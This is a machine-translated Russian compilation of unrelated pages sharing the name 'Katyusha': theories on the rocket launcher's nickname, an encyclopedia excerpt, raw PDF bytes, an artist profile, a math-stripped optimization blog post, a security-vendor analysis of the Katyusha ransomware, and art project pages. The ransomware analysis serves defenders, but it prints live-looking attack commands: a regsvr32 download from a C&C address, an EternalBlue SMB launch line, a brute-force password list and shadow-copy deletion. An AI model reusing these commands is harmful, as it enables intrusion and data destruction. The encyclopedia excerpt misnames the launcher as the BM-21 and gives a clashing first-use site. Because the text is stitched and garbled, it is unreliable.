  • По названию ставшей популярной перед войной песни Блантера на слова Исаковского «Катюша». Версия убедительная, поскольку впервые батарея капитана Флёрова стреляла по врагу 14 июля 1941 года в 10 часов утра, сделав залп по Базарной площади города Рудня. Это было первое боевое применение «Катюш», подтверждаемое и в исторической литературе[4]. Стреляли установки с высокой крутой горы — ассоциация с высоким крутым берегом в песне тут же возникла у бойцов. Наконец, жив бывший сержант штабной роты 217-го отдельного батальона связи 144-й стрелковой дивизии 20-й армии Андрей Сапронов, ныне — военный историк, который и дал ей это имя. Красноармеец Каширин, прибыв с ним вместе после обстрела Рудни на батарею, удивлённо воскликнул: «Вот это песенка!» «Катюша», — ответил Андрей Сапронов (из воспоминаний А. Сапронова в газете «Россия» № 23 от 21-27 июня 2001 года и в «Парламентской газете» № 80 от 5 мая 2005 года). Через узел связи штабной роты новость о чудо-оружии по имени «Катюша» в течение суток стала достоянием всей 20-й армии, а через её командование — и всей страны. 13 июля 2012 года ветерану и «крёстному отцу» «Катюши» исполнился 91 год.
  • Ещё есть версия, что название связано с индексом «К» на корпусе миномёта — установки выпускались заводом имени Калинина (по другому источнику[5] — заводом имени Коминтерна)[6]. А фронтовики любили давать прозвища оружию. Например, гаубицу М-30 прозвали «Матушкой», пушку-гаубицу МЛ-20 — «Емелькой». Да и БМ-13 поначалу иногда именовали «Раисой Сергеевной», таким образом расшифровывая сокращение РС (реактивный снаряд).
  • Третья версия предполагает, что именно так окрестили эти машины девушки с московского завода «Компрессор», работавшие на сборке.[источник не указан 177 дней]
  • Ещё одна, экзотичная версия. Направляющие, на которые устанавливались снаряды, назывались скатами. Сорокадвухкилограммовый снаряд поднимали два бойца, впрягшиеся в лямки, а третий обычно помогал им, подталкивая снаряд, чтобы он точно лёг на направляющие, он же сообщал державшим, что снаряд встал-закатился-накатился на направляющие. Его-то, якобы, и называли «катюшей» (роль державших снаряд и закатывающего постоянно менялась, так как расчёт БМ-13, в отличие от ствольной артиллерии, не был в явном виде разделён на заряжающего, наводящего и др.)[источник не указан 177 дней]
  • Следует также отметить, что установки были настолько засекречены, что даже запрещалось использовать команды «пли», «огонь», «залп», вместо них звучали «пой» или «играй» (для запуска надо было очень быстро крутить ручку электрокатушки), что, возможно, тоже было связано с песней «Катюша». Да и для нашей пехоты залп «катюш» был самой приятной музыкой.[источник не указан 177 дней]
  • Есть предположение о том, что первоначально прозвище «катюша» имел фронтовой бомбардировщик, оснащённый реактивными снарядами — аналогом М-13. И прозвище перескочило с самолёта на ракетную установку через снаряды.[источник не указан 177 дней]
  • Опытная эскадрилья бомбардировщиков СВ (командир Дояр)в боях на Халхин-Голе была вооружена реактивными снарядами РС-132. Бомбардировщики СБ (скоростной бомбардировщик) иногда называли «Катюша». Кажется, это название появилось еще во время гражданской войны в Испании 1930-х годов.
  • В немецких войсках эти машины получили название «сталинские орга́ны» из-за внешнего сходства реактивной установки с системой труб этого музыкального инструмента и мощного ошеломляющего рёва, который производился при запуске ракет.[источник не указан 177 дней]
  • Во время боёв за Познань и Берлин установки для одиночного пуска М-30 и М-31 получили от немцев прозвище «русский фаустпатрон», хотя эти снаряды использовались не как противотанковое средство. «Кинжальными» (с дистанции 100—200 метров) пусками этих снарядов гвардейцы проламывали любые стены.[источник не указан 177 дней]

Галерея

См.

также

Примечания

Литература

Ссылки

«Катюша». Большая энциклопедия техники

«Катюша». Большая энциклопедия техники

ВикиЧтение

Большая энциклопедия техники
Коллектив авторов

«Катюша»

«Катюша» – боевая машина реактивной артиллерии БМ-21, использовавшаяся в годы Великой Отечественной войны. Впервые была применена при уничтожении скопления вражеских эшелонов на станции Орша 14 июля 1941 г., когда залпы «Катюши» буквально ошеломили фашистов.

Советская реактивная установка «Катюша» в годы Великой Отечественной войны была главной ударной силой Советской Армии. Массирование огня достигало небывалых размеров. Во время наступательных операций в 1944—1945 гг. плотность выстрелов достигала иногда до 200 снарядов на один километр фронта.

В Берлинском сражении, начавшемся 16 апреля 1945 г., принимало участие более 41 600 орудий и минометов, что позволило создать такую высокую плотность огня, благодаря которой советские войска за несколько дней смогли пройти более 100 км и войти в столицу Германии Берлин.

Данный текст является ознакомительным фрагментом.

Продолжение на ЛитРес

Читайте также

«Катюша»

«Катюша» «Катюша» – боевая машина реактивной артиллерии БМ-21, использовавшаяся в годы Великой Отечественной войны. Впервые была применена при уничтожении скопления вражеских эшелонов на станции Орша 14 июля 1941 г., когда залпы «Катюши» буквально ошеломили

Твоя персональная «Катюша»

Твоя персональная «Катюша» Похвальное слово миномету Ныне неотъемлемой частью вооружения всех пехотных подразделений, начиная со взвода, являются и минометы. Так называются небольшие гладкоствольные орудия, стреляющие особыми оперенными снарядами – минами.И хотя, как

КАТЮША

КАТЮША В музыке питерской группы КАТЮША непринужденно смешались мотивы арт-рока и неоромантики, латино и блюз, поп и хард-рок, ее мелодии выразительны, лаконичны и изысканны, а тексты исследуют бесконечные глубины авторского сознания, подсознания и памяти. К песням

%PDF-1.5 % 281 0 объект > эндообъект внешняя ссылка 281 104 0000000015 00000 н 0000002482 00000 н 0000002611 00000 н 0000002663 00000 н 0000003360 00000 н 0000003950 00000 н 0000004243 00000 н 0000004325 00000 н 0000004433 00000 н 0000004608 00000 н 0000004778 00000 н 0000004979 00000 н 0000005139 00000 н 0000005310 00000 н 0000005481 00000 н 0000005656 00000 н 0000005821 00000 н 0000005990 00000 н 0000006159 00000 н 0000006328 00000 н 0000012318 00000 н 0000012403 00000 н 0000012631 00000 н 0000012927 00000 н 0000013206 00000 н 0000013333 00000 н 0000013738 00000 н 0000058295 00000 н 0000058468 00000 н 0000058562 00000 н 0000058607 00000 н 0000058869 00000 н 0000066406 00000 н 0000066429 00000 н 0000066452 00000 н 0000066508 00000 н 0000066676 00000 н 0000066818 00000 н 0000066987 00000 н 0000067156 00000 н 0000067334 00000 н 0000067476 00000 н 0000067618 00000 н 0000067787 00000 н 0000067939 00000 н 0000068081 00000 н 0000068251 00000 н 0000068403 00000 н 0000068544 00000 н 0000068714 00000 н 0000069247 00000 н 0000070200 00000 н 0000070890 00000 н 0000071148 00000 н 0000071273 00000 н 0000071522 00000 н 0000071669 00000 н 0000071900 00000 н 0000072219 00000 н 0000072382 00000 н 0000072695 00000 н 0000072790 00000 н 0000072999 00000 н 0000073246 00000 н 0000073323 00000 н 0000073543 00000 н 0000073736 00000 н 0000074047 00000 н 0000074796 00000 н 0000075238 00000 н 0000076109 00000 н 0000076582 00000 н 0000076815 00000 н 0000077127 00000 н 0000077194 00000 н 0000077415 00000 н 0000077605 00000 н 0000077866 00000 н 0000078182 00000 н 0000078608 00000 н 0000079007 00000 н 0000079407 00000 н 0000079810 00000 н 0000080276 00000 н 0000187051 00000 н 0000278256 00000 н 0000291338 00000 н 0000354152 00000 н 0000440668 00000 н 0000451980 00000 н 0000453834 00000 н 0000531532 00000 н 0000535979 00000 н 0000551775 00000 н 0000553256 00000 н 0000555051 00000 н 0000555128 00000 н 0000555224 00000 н 0000555318 00000 н 0000555470 00000 н 0000555571 00000 н 0000555712 00000 н 0000555832 00000 н 0000555994 00000 н трейлер ] >> startxref 0 %%EOF 282 0 объект > эндообъект 283 0 объект > эндообъект 284 0 объект > поток xc«`g`JR7D

КАТЮША: современная русская художница — SINGULART

КАТЮША: современная русская художница — SINGULART

Художник | Россия

Год рождения: 1986

КАТЮША — Художник

Реквизиты для входа

  • Участник групповых шоу
  • Международная экспозиция
  • Опытный художник
  • призер
  • Участник персональных выставок
  • Работает на комиссии

Подписаться на этого исполнителя


« Я верю в красоту, я люблю ее.Через красоту я чувствую огромную энергию искусства. »

Екатерина Никитина — российская художница, картины которой экспонировались на всероссийских и международных выставках. Она создает свой образный язык, интерпретирующий баланс между духовным и физическим существованием. Это именно та гармония, к которой она стремится. Оригинальные фигуративные композиции Екатерины созданы в смешанной технике.

СОРТИРОВАТЬ ПОЦена: от низкой до высокойЦена: от высокой до низкойРазмер: от маленького до большогоРазмер: от большого к маленькому

Тебе нравится КАТЮША?

Подпишитесь на нее, чтобы получать эксклюзивные новости о ее последних работах!

Учетные данные

  • 2021
    Международный фестиваль живописи «Золотой талант времени» Номинация: живопись Соединенное Королевство — первая премия — Лондон, Великобритания
  • 2021
    Всероссийский конкурс изобразительных искусств в Санкт-Петербурге. Санкт-Петербург в номинации «Женский образ»- II место- Санкт-Петербург, Россия
  • 2020
    Международный конкурс современного искусства, номинация -Искусство авангарда, победитель номинации, Санкт-Петербург. St. Petersburg Art Week: 11-16 августа 2020 г. XII Международная выставка-конкурс современного искусства — III премия — Санкт-Петербург, Россия
  • 2020
    W&P Gallery by want&paint Co / Новослободская ул.20, г. Москва, Россия
  • 2022
    EIN BLICK AUS DER FERNE / Швейцария — Люцерн, Швейцария
  • 2022
    Art International Zürich — Contemporary Art / Швейцария — Цюрих, Швейцария
  • 2021
    Художественная выставка / Швейцария — ZUG, Швейцария

Подпишитесь на рассылку СИНГУЛАРТ

Избранные художники

со всего мира

Безопасная доставка по всему миру

от профессионалов.

Бесплатный возврат

в течение 14 дней после доставки.

Безопасные платежи

кредитной картой или банковским переводом.

Подпишитесь на новости о трендах, артистах, эксклюзивных распродажах и многом другом!

Чтобы получить эксклюзивный обзор последних работ %name%, оставьте здесь свой адрес электронной почты!

Подпишитесь на персонализированные уведомления. Оставайтесь на связи с миром искусства.

Подписаться Не сейчас

SA120220329 SA2202203 SA32022 SA4202213 SA5художник

быстрее, чем SGD 2: разгон «Катюши»

SGD хорошо известен масштабной оптимизацией. На мой взгляд, на данный момент есть два принципиально разных улучшения с момента первоначального введения SGD: (1) уменьшение дисперсии и (2) ускорение. Следующий рисунок теоретически предсказывает разницу в производительности между наивным SGD, SGD с уменьшенной дисперсией и ускоренным SGD:
Здесь — количество стохастических итераций, а полный проход набора данных соответствует итерациям.Некоторые простые выводы из рисунка включают в себя:

  1. Если значение превышает несколько кратных , никогда не следует использовать наивный SGD. Красная кривая всегда медленнее, чем уменьшение/ускорение дисперсии.
  2. Ускоренный SGD не медленнее, чем SGD с уменьшенной дисперсией во всех режимах параметров. Синие и фиолетовые кривые соприкасаются точно в одной и той же точке, когда есть несколько копий . Игнорируя логарифмический фактор, если , то ускоренный SGD теоретически в раз быстрее, чем SGD с уменьшенной дисперсией.

Снова рассмотрим известную составную выпуклую задачу минимизации

Предположим для простоты, что каждая из них -гладкая, а функция не является сильно выпуклой. (Эти допущения можно безопасно удалить.) Тогда скорости сходимости ванильного SGD, SGD с уменьшенной дисперсией (лучший результат в этой статье) и ускоренного SGD (лучший результат в этой статье) составляют соответственно:

Здесь – верхняя граница дисперсии . Соотношение между и зависит от структуры ; в целом может быть до .

Напомним, что теория ускорения впервые введена Нестеровым и изучена в полноградиентных и координатно-градиентных установках. Основная идея заключается в использовании импульса, который иногда называют импульсом Нестерова .

Неформально говоря, вместо движения в направлении отрицательного градиента можно двигаться к для некоторого параметра импульса . Это уменьшает скорость сходимости от до , что квадратично быстрее. (На самом деле алгоритм намного сложнее.)

К сожалению, Импульс Нестерова не работает при наличии стохастических градиентов .Существуют наборы данных (см. конец поста), для которых импульс не дает сходимости. Основная причина заключается в том, что ошибка, вызванная стохастическими градиентами, каким-то образом увеличивается из-за импульса Нестерова.

В этой недавней статье мы нашли решение этой проблемы, по крайней мере, для выпуклой оптимизации. На высоком уровне, помимо импульса Нестерова, мы ввели новый импульс Катюши , служащий отрицательным импульсом для компенсации ошибки, накопленной импульсом Нестерова.

Неформально, в каждой из первых итераций мы вычисляем, где находится стохастический градиент с уменьшенной дисперсией (см. этот пост). Затем определите истинную следующую точку. Как показано на рисунке ниже, мы, по сути, помещаем магнит вокруг начальной точки и возвращаемся к ней со скоростью . Затем, один раз на каждой итерации, мы перемещаем магнит в . См. рисунок ниже. Черные векторы — направления отрицательного стохастического градиента, а зеленые векторы — направления импульса Нестерова.Мы назвали эти оранжевые векторы импульсом «Катюши» , которые — кажущиеся отрицательными — на самом деле стабилизируют алгоритм. Эта новая идея обеспечивает надежное достижение ускоренной скорости сходимости. Это первая известная скорость сходимости среди стохастических методов.

PS: реальный алгоритм немного сложнее, чем картинки. Подробности смотрите в моей статье.

Следующий простой эксперимент (на наборе данных RCV1) иллюстрирует сравнение между SGD с уменьшенной дисперсией (красный), моим методом Катюши (черный) и наивным «ускоренным» методом, который не использует импульс Катюши (пунктир, настроенный с лучшим параметром ). Из этой картины видно, что без импульса Катюши ускоренная скорость сходимости может быть недостижима .

Этот метод Катюши, по-видимому, является первым методом, который сходится по скорости среди стохастических методов минимизации выпуклых составов.

Когда я писал статью, я предположил, что импульс «Катюши» должен работать в более широкой повестке дня, и, возможно, всем, кто занимается крупномасштабной оптимизацией, следует «обнять Катюшу». Я рад видеть на этой неделе, что группа исследователей уже применила его к ADMM и сделала возможной ускоренную стохастическую конвергенцию.

Как насчет невыпуклой оптимизации? Ну, наивный SGD с ускорением Нестерова был применен к глубокому обучению и работает достаточно хорошо. Мне почему-то кажется, что SGD с катюшным ускорением работает (по крайней мере, при определенных настройках) и для глубокого обучения. Я еще не проводил числовых экспериментов. В общем, теории ускорения для невыпуклой оптимизации не существует, по крайней мере, на сегодняшний день.

Нравится:

Нравится Загрузка…

Родственные

Изощренная программа-вымогатель: «Катюша»

В течение нескольких месяцев Quick Heal Security Labs наблюдает за ростом программ-вымогателей, мы обнаружили еще одну интересную программу-вымогатель, которая шифрует файлы и добавляет расширение «.катюша» и требует 0,5 бита в течение трех дней, а также угрожает предоставить данные для публичного скачивания, если выкуп не будет выплачен. Вредоносное ПО связано со многими компонентами, в том числе с использованием эксплойта « Double pulsar » и « Eternal blue », которые используются для распространения по сети. Кроме того, для распространения по сети используется уникальная техника атаки под названием « squiblidoo ». Вектор заражения для этой программы-вымогателя до сих пор не подтвержден, но на основании атрибуции эта программа-вымогатель может проникнуть в систему через целевой фишинг, вредоносную рекламу, спам-почту, эксплойт SMB и т. д.

Технический анализ :

Эта вредоносная программа упакована с MPRESS (v2.19) и присутствует в системе жертвы с именем « katyusha.exe » в «%temp%». Он содержит три компонента. При выполнении он бросает их в C:\Windows\Temp и запускает их выполнение:

  • Svchost0.bat
  • Zkts.exe
  • Ktsi.exe

Катюша проверяет следующие файлы в системе, чтобы определить, заражена ли система уже или нет.

«C:\_how_to_decrypt_you_files.txt»

«C:\ProgramData\_how_to_decrypt_you_files.txt»

Если система уже заражена, Катюша создает пакетный файл (svchost0.bat), содержащий код, показанный на рис.1. удалить самокопию и прекратить работу. Если система не заражена, то он сбрасывает zkts.exe и ktsi.exe и выполняет их.

Рис. 1: Содержимое Svchost0.bat

 

Зкт.исполняемый файл :

Этот файл является сжатым исполняемым файлом 7zip и основным компонентом, который содержит несколько подмодулей, таких как модуль распространения по сети, модуль кражи паролей и т. д.

При выполнении zkts.exe извлекает компоненты в « C:\Windows\Temp », такие как Mimikatz, katyusha.dll, вечный синий эксплойт и т. д., которые позже используются Катюшей для выполнения действия.

Рис. 2. Файлы, удаленные zkts.exe

 

Кци.exe (шифровальщик):

Это еще один основной компонент, который также является упакованным файлом MPRESS. Он в основном используется для шифрования файлов и размещения заметки о выкупе в системе жертвы. Этот процесс запускается независимо основной полезной нагрузкой (katyusha.exe), как показано на рис. 3.

Рис. 3. Вызов CreateProcess() для ktsi.exe

При выполнении ktsi.exe он сначала уничтожает список следующих задач, чтобы освободить дескрипторы файлов, которые заблокированы соответствующими процессами для шифрования (например, файлы базы данных и т. д.), как показано на рис. 4.

Для успешного шифрования файлов, связанных с базой данных, ktsi уничтожает процессы, связанные с приложениями базы данных. Ниже приведен список процессов, жестко запрограммированных в вредоносном ПО:

.
mysqld.exe  httpd.exe sqlsevr.exe
sqlwriter.exe  w3wp.exe sqlagent.exe
fdhost.exe  fdlauncher.exe  reportingservicesservice.exe
омцреко.исполняемый файл   tnslsnr.exe   oracle.exe
emagent.exe  mysqld-nt.exe

Рис. 4: Выполнение команды Taskkill.

После операции taskkill вредоносное ПО сбрасывает примечание о выкупе в формате html и txt по указанному ниже пути, чтобы сделать его видимым для всех пользователей при запуске системы,

«C:\ProgramData\Microsoft\Windows\Главное меню\Программы\Автозагрузка»

_how_to_decrypt_you_files.txt

_how_to_decrypt_you_files.html

В «C:\ProgramData» и в корень диска C (C:\) поместите только примечание о выкупе как «_how_to_decrypt_you_files. txt».

Рис. 5: Записка о выкупе

Ktsi.exe также удаляет теневую копию, выполнив следующую команду:

«vssadmin удалить тени / все / тихо»

Рис. 6: удаление теневой копии

После выполнения всех этих задач ktsi.exe запускает шифрование файлов (RSA) с помощью стандартного метода шифрования CRYPTOGAMS . Подписи, относящиеся к этому алгоритму, находятся в файле, как показано на рис. 7.

Рис. 7: Строки Cryptogams.

Шифрует все файлы расширения, кроме следующего,

Рис. 8: Исключенные расширения из шифрования.

Он также содержит список исключений файлов и папок (как показано на рис. 9), если эти слова найдены в пронумерованном пути к файлу, то этот путь будет исключен из шифрования. Для обеспечения бесперебойного шифрования список содержит названия нескольких продуктов безопасности.

Рис. 9: Список исключений файлов и папок.

Механизм разбрасывания:

Для распространения по сети используются файлы, извлеченные из zkts. Пожалуйста, обратитесь к рис. 2 для извлеченных компонентов.

m32.exe и m64.exe — это инструменты Mimikatz, которые используются для получения учетных данных из Windows lsass.exe.

Во-первых, katyusha.exe определяет, является ли система 64-битной или 32-битной, используя системный вызов IsWow64Process (он возвращает ненулевое значение, если система 64-битная) и выполняет Mimikatz в соответствии с архитектурой системы.

Инструмент Mimikatz удаляет следующие файлы по адресу «C:\Windows\Temp» в качестве вывода.

— snamelog: содержит полученные имена пользователей.

— spaslog: содержит пароли для соответствующих извлеченных имен пользователей.

Рис. 10: Проверьте, чтобы определить тип системы и запустить Mimikatz.

После выполнения mimikatz katyusha.exe считывает имена пользователей из snamelog и пароли из spaslog, которые используются для проведения атаки методом перебора в сеть.

Zkts.exe также удаляет svchostb. exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll и svchostp.exe. Эти компоненты используются для распространения Катюши по сети.

С помощью выпавшего эксплойта вечный синий и двойного пульсара вредоносное ПО последовательно запускает katyusha.dll на системах, подключенных к сети. Для этого katyusha.exe использует уязвимость SMB с помощью следующей команды

.

«C:\windows\temp\&svchostb.exe –TargetIp & svchostbs.exe –OutConfig s –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload katyusha.dll –TargetIp »

Рис. 11: Выполнение эксплойта на каждой системе в сети.

Katyusha.dll — файл полезной нагрузки, содержащий код для выполнения следующей команды,

«regsvr32 /u /s /i:hxxp://86.106.102.147/img/katyusha.data scrobj.dll»

Мы также можем найти жестко запрограммированные строки команд в файле, как показано на рис. 12.

Рис. 12: Команда для загрузки и выполнения скрипта с URL-адреса

При выполнении вышеуказанной команды regsvr32 (Сервер регистрации Microsoft) он загрузит скрипт (katyusha. data) с заданного URL-адреса и вызовет сервер отмены регистрации с параметром regsvr32 (/u).Это выполнит код javascript под тегом из загруженного скриптлета, как показано на рис. 13. Сценарий содержит код для загрузки katyusha.exe из заданного URL-адреса по адресу «%temp%» каталога и его выполнения.

Рис. 13: содержимое скрипта katyusha.data

Рис. 14: Запрос на загрузку скрипта и полезной нагрузки в зараженной системе.

Такая атака с использованием команд regsvr32 для загрузки скриптлета с C&C и их выполнения обозначается как «squiblidoo» .

После вышеуказанного действия он также переходит к перебору систем в сети с помощью Power Admin Tool (svchostp.exe). Этот инструмент похож на инструмент sysinternals PsExec , используемый для выполнения процессов в удаленной системе. Этот вымогатель сам имеет список нескольких имен пользователей и паролей, как указано ниже, наряду с тем, что он также использует имена пользователей и пароли, полученные Mimikatz (snamelog и spaslog) для атаки методом грубой силы.

Имена пользователей:

Админ, администратор, +содержимое snamelog.

Пароли:

admin, 12345, chinachina203, 111, 123456, qwerty, test, abc123, 12345678, 0000, 1122, 1234, +содержимое спаслога.

При переборе катюша использует следующую команду,

«C:\Windows\temp\svchostp.exe -u <имя пользователя> -p <пароль> -n 10 -s regsvr32 /u /s /i:https://86.106.102.147/img/katyusha. данные scrobj.dll»

Приведенная выше команда просто запускает утилиту regsvr32 с URL-адресом в качестве параметра для загрузки полезной нагрузки и выполняет действия, описанные выше для катюши.dll.

Рис. 15. Использование мощного инструмента администрирования (svchostp.exe)

МОК :

   MD5:  7f87db33980c0099739de40d1b725500

   URL:

  1.  hxxp://86.106.102.147/img/katyusha.data
  2. hxxp://86.106. 102.147/img/katyusha.exe

   Адрес Биткойн-кошелька:  «3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK»

Заключение :

В этом году мы наблюдаем всплеск числа программ-вымогателей, они используют новые способы распространения, а также для шифрования данных.Теперь большинство программ-вымогателей поставляются в комплекте с эксплойтом и такими инструментами, как «вечный синий», «мимикац» для распространения по сети. Мы предлагаем пользователям избегать доступа к подозрительным URL-адресам/электронным письмам, использовать надежные системные учетные данные и регулярно обновлять свой антивирус.

Эксперт по предмету:

Пратик Пачпор | Лаборатория безопасности Quick Heal

Другая работа — Алиси Теленгут

Сила, Силап Инуа, Силла (2020)
Связанная с выставкой «Критические зоны», инуитская мудрость «Сила» была выдвинута на передний план благодаря критике Бруно Латура ученым-метисом Зои Тодд.
С Filmuniversität Babelsberg Konrad Wolf и Das ZKM | Zentrum für Kunst und Medien Karlsruhe / ZKM | Центр искусства и медиа Карлсруэ, Германия.
Спасибо: Кристин Ри-Питерс
https://zkm.de/de/eine-filmische-auseinandersetzung-mit-der-ausstellung-critical-zones

Другой просмотр
2021/06 Видеоканава, куратор Йонне Кауко, Art Fair Suomi, Хельсинки, Финляндия

Фрагмент пикселизации, снятый в заброшенных зданиях района Сен-Анри, Монреаль
Снято на 16-мм камеру Bolex, переведено в цифру
Алиси Дэвид Паскаль Явана

«Проект Монголия — это выставка современного искусства и мероприятия в Великобритании для монгольских и зарубежных художников, вдохновленных этой страной. » Это первый в своем роде в Великобритании.
Куратор и организатор: Анна-Луиза Хейл
Руководитель проекта и организатор: Джулия Стаффорд

Выставки
28.10.2015 — 11.02.2015
Приватный просмотр 30.10.2015
Галерея Art Hub — 5-9 Creekside Deptford SE8 4SA London UK
Художники: Роуз Бак, Себастьян Виларино, Совай Берриман, Макс Дофин, Алиси Теленгут, Анна-Луиза Хейл
Куратор: Анна-Луиза Хейл
Видео Ника Скарборо

25/07/2015
Семейный день на городской ферме Спиталфилдс, Бакстон-стрит.E1 5AR Лондон
Художники/работы, участвующие в мероприятиях:
Истории — Сара Рандл
Музыка — Кочевые мелодии
Анимация — Алиси Теленгут
Куратор: Анна-Луиза Хейл
Видео проекта «Монголия»

С Art Embassy (2015-16)
Facebook: https://www. facebook.com/AEmbassy/

Тема 1: Виртуальное общение (2015)
Кредиты: концепция, анимация, монтаж, звуковой дизайн и монтаж
Техника: роспись по стеклу снизу и роспись по бумаге сверху


Тема 2: Черный (2016)
Кредиты: концепция, анимация, монтаж, звуковой дизайн и монтаж
Техника: отсканированная картина, кадр за кадром

Экспериментальный анимационный цикл для четвертого выпуска MTL ZOO, выставки, организованной FONKi и Le Bonnar, продвигающей молодых монреальских художников, работающих в различных медиа.
06 мая — 05 июня 2016, Artgang Montréal Gallery


Катюша
Короткометражный анимационный фильм по мотивам народной песни «Катюша».
Нарисовано на бумаге, снято на 35-мм пленку на штативе Senior Oxberry, переведено в цифру

Девушка-дерево
Девушка с дерева просыпается весной под пение птиц.
Кредиты: режиссер, изготовление кукол, сценография, создание декораций, анимация, монтаж и редактирование звука
Техника: Покадровая анимация, снятая на видеокамеру Sony HD
Фестивальный показ
2014/02 Международный фестиваль детских фильмов Play-Lisbon
Лиссабон, Португалия

Вводной проект Общества анимационных изображений TAIS-Торонто «Микс-сироп» был создан под руководством приглашенной японской художницы Майи Йонешо.
Кредиты: аниматор, признанный художник
Сводка: «Микс-сироп» — это короткий абстрактный экспериментальный фильм, синхронизированный с музыкой, звуком и пейзажным изображением, основанный на достопримечательностях Торонто под руководством Майи в студии TAIS.
Оригинальная песня: Лидо Пимьента, местный художник и музыкант из Торонто
. Показ: 11 июля 2014 г. Японский фонд, Торонто, Канада

Висконсинская триеннале 2016 года представляет собой короткометражный фильм, действие которого происходит в русском поселении Пирамида.Фильм Стивена Хильярда Катюша (Катюша) объединяет кадры из заброшенного поселения и кадры, снятые в Висконсине, чтобы рассказать историю «подарочного камня», обнаруженного Хильярдом в городе-призраке. Название инсталляции отсылает к русской песне, написанной в 1938 году, которая не теряет своей популярности и по сей день.

Пирамида является или была самым северным городом в мире. Он расположен на Шпицбергене, норвежском архипелаге за Полярным кругом, всего в 500 милях от Северного полюса. В 1920 году Договор о Шпицбергене предоставил Норвегии суверенитет над архипелагом, но дал всем подписавшим его сторонам равные права на развитие там коммерческой деятельности.Норвегия и Советский Союз были двумя подписавшими сторонами, которые наиболее активно занимались предпринимательской деятельностью.

В 1936 году Советский Союз приобрел права на угольные месторождения в Пирамиде и начал развивать там поселок. После закрытия шахт в 1998 году Пирамида была заброшена в течение двух дней. Как показано в Катюша (Katyusha) , здания и инфраструктура сохранились и по сей день.

Инфраструктура Пирамиды хоть и заброшена, но осталась нетронутой. Courtesy Стивен Хильярд

Стивен Хильярд — профессор цифрового искусства на факультете искусств Университета Вашингтона в Мэдисоне. Катюша (Katyusha) можно будет увидеть до 8 января 2017 года в Музее современного искусства Мэдисона в рамках Висконсинской триеннале. В трехканальной видеоинсталляции звучит музыка в исполнении Оркестра русских народных инструментов UW.

CREECA поговорила с Hilard о производстве Катюша (Katyusha) :

Что послужило источником вдохновения для Катюша (Катюша) ?

Он был вдохновлен моим первым посещением Пирамиды в 2012 году. Мои первоначальные планы на произведение были намного проще, чем окончательный вариант. Изменения произошли из-за различных событий, которые я получил во время моей второй экспедиции на Шпицберген, самым важным из которых было мое случайное открытие «подарочного камня», который находится в центре повествования. Я нашел камень, как вы видите в фильме, в начале экспедиции. Это привело меня к развитию двух персонажей и истории их отношений.

«Даровый камень» — простой камень, перевязанный лентой, — как его нашел Хильярд в Пирамиде.Предоставлено Стивеном Хильярдом

Что привлекло вас в Пирамиде? Как вы думаете, в чем заключается постоянная актуальность этого города/его истории?

Меня привлекала Пирамида, потому что это было целое живое сообщество, существовавшее только благодаря идеалу. Он был задуман как демонстрация советской социальной и политической системы — путем создания энергичного города, противоречащего одной из самых враждебных сред на земле, он должен был доказать превосходство советской системы над ее западными конкурентами. Проект был одновременно идеалистическим и принудительным; жизнь была суровой во многих отношениях, но идиллической в ​​других. В период своего расцвета Пирамида была очень желанной должностью, которая обеспечивала рабочим более высокий уровень жизни, чем в других частях Советского Союза. У многих бывших жителей очень теплые воспоминания о времени, проведенном там. С другой стороны, вся община находилась под постоянным наблюдением сотрудников КГБ. Когда идея, на которой была построена Пирамида, в конце концов провалилась, община была заброшена.Как пережиток неудавшегося идеала, Пирамида тем более остра, что реальные люди использовались в качестве маркеров в соревновании идеологий.

Вы раньше работали с Россией?

Нет, я никогда раньше не работал с русской тематикой. Сила идей, формирующих наше восприятие мира, была постоянной темой в моей работе. Однако в прошлом это были более абстрактные идеалы. Катюша (Katyusha) — это первый мой проект, затрагивающий общественно-политическую тематику, пусть и косвенно. Это будет частью более крупной работы на Шпицбергене. Другие части, над которыми я сейчас работаю, касаются обратной стороны истории: способов, которыми Норвегия проецировала идеалы западного национального государства на дикие ландшафты.

Представление Хильярда о происхождении подарочного камня. Предоставлено Стивеном Хильярдом

Как вы произвели инсталляцию? Вы сами снимали видео? Вы использовали найденные кадры?

Все фото и видео снимал сам. Это произошло во время моей экспедиции на Шпицберген в 2014 году, во время которой я провел 7 дней в Пирамиде.Все кадры, представляющие детство персонажей в Украине, были сняты в Висконсине в 2015 и 2016 годах. Многие кадры, которые кажутся видео, на самом деле являются цифровыми анимациями, созданными из неподвижных изображений с использованием различных методов 2D, 2,5D и 3D-анимации. .

Установка воспроизводится на трех мониторах. Иногда они пересекаются, иногда нет. Как производился этот эффект?

В процессе установки вы видите три отдельных видеофайла, каждый из которых воспроизводится с отдельного твердотельного видеоплеера. Плееры объединены в сеть и запрограммированы на синхронизацию трех отдельных видео. Эти отдельные «каналы» видео были созданы с помощью довольно сложной настройки в After Effects. То, что входило в эту настройку, представляло собой смесь HD-видео (которое можно было назначить на один экран), видео 4K (которое можно было распределить по 2 экранам) и анимацию из неподвижных изображений и 3D-моделей (которое можно было распределить по 3 экранам). . Многое из того, что вы видите, на самом деле создано с использованием 2D- и 3D-анимации в After Effects и Maya.

Установка, как она появляется на MMoCA. Фото: Митч Шварц, с разрешения Стивена Хильярда

Каким был ваш визит в Пирамиду? Какое впечатление произвели на вас остатки города?

Провести целую неделю в арктическом городе-призраке в разгар полуночного солнца — это уникальный опыт. Мой первый визит в Пирамиду был всего на один день в конце 2-1/2-недельной экспедиции вокруг архипелага Шпицберген. Во время такого короткого визита большинство людей поражены странностью заброшенного города и его местоположения. Только проведя там дни в одиночестве в разных зданиях по 16 часов подряд, острота заброшенного сообщества начала доходить до меня. Призраки начали выходить из стен, и я провел много часов, представляя жизнь, которая когда-то жили в местах, где я работал. Хотя многие оставшиеся реликвии говорят о счастье и тепле сообщества, которое когда-то жило там, всеохватывающее чувство было грустью и потерей. Сообщество, которое развивалось почти 70 лет, было прервано за два дня, как только его первоначальная функция как проекции государства больше не могла поддерживаться.

Такое сопоставление очевидно в вашем конечном продукте – неподвижных и движущихся изображений, рукотворного искусства и природы, прошлого и настоящего. Как эти темы раскрываются в сопоставлениях, которые вы используете?

